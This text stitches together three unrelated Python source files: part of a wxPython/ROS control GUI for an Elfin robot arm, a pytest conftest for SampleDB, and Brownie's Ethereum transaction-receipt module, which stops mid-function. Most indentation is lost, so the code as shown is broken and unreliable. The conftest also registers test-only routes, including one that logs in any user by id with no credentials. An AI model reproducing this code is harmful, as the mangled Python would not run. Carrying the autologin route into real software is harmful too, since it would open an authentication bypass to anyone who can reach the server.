for i in range(4,8):
if 0 == self.DO_btn[i]:
self.LED_display[i-4].SetBackgroundColour(wx.NullColour)
else:
self.LED_display[i-4].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201207: add function to set End_btn colour
def set_End_btn_colour(self):
self.DI_show_lock.acquire()
for i in range(4,8):
if 0 == self.DI_show[i]:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_low.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
else:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_high.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
self.DI_show_lock.release()
def set_color(self, evt):
wx.CallAfter(self.set_DO_btn_colour)
wx.CallAfter(self.set_DI_show_colour)
wx.CallAfter(self.set_LED_show_colour)
wx.CallAfter(self.set_End_btn_colour)
def show_message_dialog(self, message, cl, rq):
msg='executing ['+message+']'
self.dlg_label.SetLabel(msg)
        label_size=[]
        label_size.append(self.dlg_label.GetSize()[0])
        label_size.append(self.dlg_label.GetSize()[1])
        self.dlg.SetSize((label_size[0]+30, label_size[1]+30))
t=threading.Thread(target=self.thread_bg, args=(message, cl, rq,))
t.start()
def show_dialog(self):
self.dlg.SetPosition((self.GetPosition()[0]+250,
self.GetPosition()[1]+250))
self.dlg.ShowModal()
def destroy_dialog(self):
self.dlg.EndModal(0)
def closewindow(self,event):
pass
def show_set_links_dialog(self, evt):
self.sld_ref_link_show.SetValue(self.ref_link_name)
self.sld_end_link_show.SetValue(self.end_link_name)
self.set_links_dlg.SetPosition((self.GetPosition()[0]+150,
self.GetPosition()[1]+250))
self.set_links_dlg.ShowModal()
def update_ref_link(self, evt):
request=SetStringRequest()
request.data=self.sld_ref_link_show.GetValue()
resp=self.call_set_ref_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def update_end_link(self, evt):
request=SetStringRequest()
request.data=self.sld_end_link_show.GetValue()
resp=self.call_set_end_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def updateDisplay(self, msg):
for i in xrange(len(self.js_display)):
self.js_display[i].SetValue(msg[i])
for i in xrange(len(self.ps_display)):
self.ps_display[i].SetValue(msg[i+6])
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
self.ref_link_show.SetValue(ref_link)
self.end_link_show.SetValue(end_link)
def update_reply_show(self,msg):
if msg.success:
self.reply_show.SetBackgroundColour(wx.Colour(200, 225, 200))
else:
self.reply_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.reply_show.SetValue(msg.message)
def update_servo_state(self, msg):
if msg.data:
self.servo_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.servo_state_show.SetValue('Enabled')
else:
self.servo_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.servo_state_show.SetValue('Disabled')
def update_fault_state(self, msg):
if msg.data:
self.fault_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.fault_state_show.SetValue('Warning')
else:
self.fault_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.fault_state_show.SetValue('No Fault')
def update_velocity_scaling_show(self, msg):
self.velocity_setting_show.SetValue(str(round(msg, 2)*100)+'%') # 20201127: change the show format
def js_call_back(self, data):
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
for i in xrange(len(data.position)):
self.key.append(str(round(data.position[i]*180/math.pi, 2)))
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
self.key=[]
def monitor_status(self, evt):
self.key=[]
current_joint_values=self.group.get_current_joint_values()
for i in xrange(len(current_joint_values)):
self.key.append(str(round(current_joint_values[i]*180/math.pi, 2)))
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(ref_link, end_link, rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(ref_link, end_link, rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
def servo_state_cb(self, data):
if self.servo_state_lock.acquire():
self.servo_state=data.data
self.servo_state_lock.release()
wx.CallAfter(self.update_servo_state, data)
def fault_state_cb(self, data):
if self.fault_state_lock.acquire():
self.fault_state=data.data
self.fault_state_lock.release()
wx.CallAfter(self.update_fault_state, data)
def ref_link_name_cb(self, data):
if self.ref_link_lock.acquire():
self.ref_link_name=data.data
self.ref_link_lock.release()
def end_link_name_cb(self, data):
if self.end_link_lock.acquire():
self.end_link_name=data.data
self.end_link_lock.release()
def listen(self):
rospy.Subscriber(self.elfin_driver_ns+'enable_state', Bool, self.servo_state_cb)
rospy.Subscriber(self.elfin_driver_ns+'fault_state', Bool, self.fault_state_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'reference_link_name', String, self.ref_link_name_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'end_link_name', String, self.end_link_name_cb)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_DO_DI)
rospy.Timer(rospy.Duration(nsecs=50000000), self.set_color)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_status)
if __name__=='__main__':
rospy.init_node('elfin_gui')
app=wx.App(False)
myframe=MyFrame(parent=None,id=-1)
myframe.Show(True)
myframe.listen()
app.MainLoop()
|
conftest.py
|
# coding: utf-8
"""
"""
import getpass
import copy
import logging
import os
import random
import threading
import time
import flask
import flask_login
import pytest
import requests
import sqlalchemy
import sampledb
import sampledb.utils
import sampledb.config
sampledb.config.MAIL_SUPPRESS_SEND = True
sampledb.config.TEMPLATES_AUTO_RELOAD = True
sampledb.config.SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://{0}:@localhost:5432/{0}'.format(getpass.getuser())
sampledb.config.MAIL_SENDER = 'sampledb@example.com'
sampledb.config.MAIL_SERVER = 'mail.example.com'
sampledb.config.CONTACT_EMAIL = 'sampledb@example.com'
sampledb.config.JUPYTERHUB_URL = 'example.com'
sampledb.config.LDAP_NAME = 'LDAP'
sampledb.config.TESTING_LDAP_UNKNOWN_LOGIN = 'unknown-login-for-sampledb-tests'
sampledb.config.TESTING_LDAP_WRONG_PASSWORD = 'wrong-password-for-sampledb-tests'
# restore possibly overridden configuration data from environment variables
sampledb.config.use_environment_configuration(env_prefix='SAMPLEDB_')
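# For example, exporting SAMPLEDB_MAIL_SERVER before running pytest overrides the
# MAIL_SERVER value set above (assumed mapping: the SAMPLEDB_ prefix is stripped and
# the remainder is matched against the config attribute names).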
def create_flask_server(app):
if not getattr(app, 'has_shutdown_route', False):
@app.route('/shutdown', methods=['POST'])
def shutdown():
func = flask.request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
return 'Server shutting down...'
app.has_shutdown_route = True
port = random.randint(10000, 20000)
server_thread = threading.Thread(target=lambda: app.run(port=port, debug=True, use_reloader=False), daemon=True)
server_thread.start()
server_thread.app = app
server_thread.initial_config = copy.deepcopy(server_thread.app.config)
server_thread.base_url = 'http://localhost:{0}/'.format(port)
server_thread.api_url = server_thread.base_url + 'api/'
# short delay to allow the web server to start
time.sleep(0.1)
yield server_thread
# restore initial configuration
server_thread.app.config = server_thread.initial_config
r = requests.post(server_thread.base_url + 'shutdown')
assert r.status_code == 200
server_thread.join()
@pytest.fixture(scope='session')
def flask_server(worker_id):
if worker_id != 'master':
sampledb.config.SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://postgres:@postgres:5432/testdb_" + worker_id[2:]
sampledb.config.FILE_STORAGE_PATH = sampledb.config.FILE_STORAGE_PATH + worker_id[2:] + '/'
app = create_app()
# empty the database first, to ensure all tests rebuild it before use
if worker_id != 'master':
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
else:
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=False)
yield from create_flask_server(app)
def create_app():
logging.getLogger('flask.app').setLevel(logging.WARNING)
os.environ['FLASK_ENV'] = 'development'
os.environ['FLASK_TESTING'] = 'True'
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb_app = sampledb.create_app()
@sampledb_app.route('/users/me/loginstatus')
def check_login():
return flask.jsonify(flask_login.current_user.is_authenticated)
@sampledb_app.route('/users/<int:user_id>/autologin')
def autologin(user_id):
user = sampledb.models.User.query.get(user_id)
assert user is not None
flask_login.login_user(user)
return ''
return sampledb_app
@pytest.fixture
def app(flask_server):
app = flask_server.app
# reset config and database before each test
app.config = copy.deepcopy(flask_server.initial_config)
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb.setup_database(app)
return app
@pytest.fixture(autouse=True)
def app_context(app):
with app.app_context():
# yield to keep the app context active until the test is done
yield None
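# Minimal usage sketch (illustrative test, not part of this file): the session-scoped
# `flask_server` fixture exposes `base_url`/`api_url`, while `app`/`app_context` give
# each test a freshly reset database and an active application context, e.g.
#
#     def test_index_reachable(flask_server):
#         r = requests.get(flask_server.base_url)
#         assert r.status_code == 200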
|
transaction.py
|
#!/usr/bin/python3
import functools
import re
import sys
import threading
import time
from collections import deque
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
from warnings import warn
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
_marker = deque("-/|\\-/|\\")
def trace_property(fn: Callable) -> Any:
    # attributes that are only available after querying the transaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
        status: Transaction status: -2 dropped, -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
        revert_msg: Error string from reverted contract call
modified_state: Boolean, did this contract write to storage?"""
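    # Usage sketch (assumes an interactive Brownie session; `token` and `acct` are
    # illustrative names, not defined in this module):
    #   tx = token.transfer(acct, 100, {"from": acct})   # returns a TransactionReceipt
    #   tx.status, tx.gas_used, tx.events                 # basic receipt data
    #   tx.call_trace()                                    # needs debug_traceTransaction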
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
type: int
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
# this event is set once the transaction is confirmed or dropped
        # it is used to wait during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
self._set_from_tx(tx)
if not self._silent:
output_str = ""
if self.type == 2:
max_gas = tx["maxFeePerGas"] / 10 ** 9
priority_gas = tx["maxPriorityFeePerGas"] / 10 ** 9
output_str = (
f" Max fee: {color('bright blue')}{max_gas}{color} gwei"
f" Priority fee: {color('bright blue')}{priority_gas}{color} gwei"
)
elif self.gas_price is not None:
gas_price = self.gas_price / 10 ** 9
output_str = f" Gas price: {color('bright blue')}{gas_price}{color} gwei"
print(
f"{output_str} Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
subcalls = filter(lambda s: not _is_call_to_precompile(s), self._subcalls) # type: ignore
return list(subcalls)
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
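        # e.g. a transaction mined in block 100 has 5 confirmations once the chain
        # head reaches block 104 (104 - 100 + 1).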
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price. For EIP1559 transactions the multiplier
            is applied to the max_fee; the priority_fee is multiplied by 1.1.
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction. For EIP1559
            transactions this is the new max_fee; the priority_fee is multiplied
            by 1.1.
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if self.gas_price is not None:
if increment is not None:
gas_price = Wei(self.gas_price * increment)
else:
gas_price = Wei(gas_price)
max_fee, priority_fee = None, None
if self.max_fee is not None and self.priority_fee is not None:
max_fee = gas_price
priority_fee = Wei(self.priority_fee * 1.1)
gas_price = None
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=gas_price,
max_fee=max_fee,
priority_fee=priority_fee,
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
contract = state._find_contract(self.receiver)
if contract:
marker = "//" if contract._build["language"] == "Solidity" else "#"
line = self._traceback_string().split("\n")[-1]
if marker + " dev: " in line:
self._dev_revert_msg = line[line.index(marker) + len(marker) : -5].strip()
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
# await first confirmation
block_number = block_number or self.block_number
nonce_time = 0.0
sender_nonce = 0
while True:
# every 15 seconds, check if the nonce increased without a confirmation of
# this specific transaction. if this happens, the tx has likely dropped
# and we should stop waiting.
if time.time() - nonce_time > 15:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
nonce_time = time.time()
try:
receipt = web3.eth.get_transaction_receipt(HexBytes(self.txid))
except TransactionNotFound:
receipt = None
# the null blockHash check is required for older versions of Parity
# taken from `web3._utils.transactions.wait_for_transaction_receipt`
if receipt is not None and receipt["blockHash"] is not None:
break
# continuation of the nonce logic 2 sections prior. we must check the receipt
# after querying the nonce, because in the other order there is a chance that
# the tx would confirm after checking the receipt but before checking the nonce
if sender_nonce > self.nonce: # type: ignore
self.status = Status(-2)
self._confirmed.set()
return
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write(f" Waiting for confirmation... {_marker[0]}\r")
else:
sys.stdout.write(
f" Required confirmations: {color('bright yellow')}0/"
f"{required_confs}{color} {_marker[0]}\r"
)
_marker.rotate(1)
sys.stdout.flush()
time.sleep(1)
# silence other dropped tx's immediately after confirmation to avoid output weirdness
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx._silent = True
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx.get("gasPrice")
self.max_fee = tx.get("maxFeePerGas")
self.priority_fee = tx.get("maxPriorityFeePerGas")
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
self.type = int(HexBytes(tx.get("type", 0)).hex(), 16)
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
if "effectiveGasPrice" in receipt:
self.gas_price = receipt["effectiveGasPrice"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status} "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.type == 2 and self.gas_price is not None:
result += f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
        # different nodes return slightly different formats. it's really fun to handle
# geth/nethermind returns unprefixed and with 0-padding for stack and memory
# erigon returns 0x-prefixed and without padding (but their memory values are like geth)
fix_stack = False
for step in trace:
if not step["stack"]:
continue
check = step["stack"][0]
if not isinstance(check, str):
break
if check.startswith("0x"):
fix_stack = True
break
fix_gas = isinstance(trace[0]["gas"], str)
if fix_stack or fix_gas:
for step in trace:
if fix_stack:
# for stack values, we need 32 bytes (64 chars) without the 0x prefix
step["stack"] = [HexBytes(s).hex()[2:].zfill(64) for s in step["stack"]]
if fix_gas:
# handle traces where numeric values are returned as hex (Nethermind)
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
if not fn:
warn(f"Unable to find function on {contract} for input {self.input}")
return
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
selector = data[:4].hex()
if selector == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
elif selector == "0x08c379a0": # keccak of Error(string)
self._revert_msg = decode_abi(["string"], data[4:])[0]
else:
# TODO: actually parse the data
self._revert_msg = f"typed error: {data.hex()}"
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
